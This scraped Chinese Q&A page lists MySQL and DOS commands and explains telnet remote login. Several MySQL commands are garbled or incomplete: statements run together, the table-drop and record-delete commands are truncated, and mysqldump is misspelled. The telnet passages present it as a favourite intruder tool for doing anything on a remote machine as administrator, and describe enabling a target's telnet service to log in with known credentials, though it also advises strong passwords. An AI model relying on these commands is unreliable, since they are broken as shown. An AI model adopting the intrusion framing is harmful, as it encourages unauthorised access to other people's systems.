create database 庫名；建庫

use 庫名；

create table 表名（欄位設定列表）；建表drop database 庫名；

表名；刪庫和刪表

from 表名；將表中記錄清空

select * from 表名；顯示表中的記錄

mysqlmp –opt school>school.bbb 備份資料庫：（命令在DOS的mysqlin目錄下執行）；注釋：將資料庫school備份到school.bbb文件，school.bbb是一個文本文件，文件名任取。

Ⅸ dos中telnet

telnet
功能強大的遠程登陸命令，幾乎所有的入侵者都喜歡用它，屢試不爽。為什麼？它操作簡單，如同使用自己的機器一樣，只要你熟悉DOS命令，在成功以administrator身份連接了遠程機器後，就可以用它來**想乾的一切了。下面介紹一下使用方法，首先鍵入telnet回車，再鍵入help查看其幫助信息。
然後在提示符下鍵入open IP回車，這時就出現了登陸窗口，讓你輸入合法的用戶名和密碼，這里輸入任何密碼都是不顯示的。
當輸入用戶名和密碼都正確後就成功建立了telnet連接，這時候你就在遠程主機上具有了和此用戶一樣的許可權，利用DOS命令就可以實現你想乾的事情了。這里我使用的超級管理員許可權登陸的。
到這里為止，網路DOS命令的介紹就告一段落了，這里介紹的目的只是給菜鳥網管一個印象，讓其知道熟悉和掌握網路DOS命令的重要性。其實和網路有關的DOS命令還遠不止這些，這里只是拋磚引玉，希望能對廣大菜鳥網管有所幫助。學好DOS對當好網管有很大的幫助，特別的熟練掌握了一些網路的DOS命令。
另外大家應該清楚，任何人要想進入系統，必須得有一個合法的用戶名和密碼（輸入法漏洞差不多絕跡了吧），哪怕你拿到帳戶的只有一個很小的許可權，你也可以利用它來達到最後的目的。所以堅決消滅空口令，給自己的帳戶加上一個強壯的密碼，是最好的防禦弱口令入侵的方法。

Ⅹ DOS下的命令telnet 對方IP埠是做什麼的

上面回答的都很詳細啊。。要用自己的話
會說嗎？
telnet就是遠程登陸
它是一個很重要的服務，黑客有的就是要用這個服務進入你的系統做一些操作的。所以它在默認情況下是關閉的
你可以通過mmc聯接到控制台。
把服務添加了。開啟對方的telnet服務。完了以後輸入對方的ip。如果知道對方的用戶名和密碼就好了

導航:首頁 > 程序命令 > dos命令大全telnet

dos命令大全telnet

與dos命令大全telnet相關的資料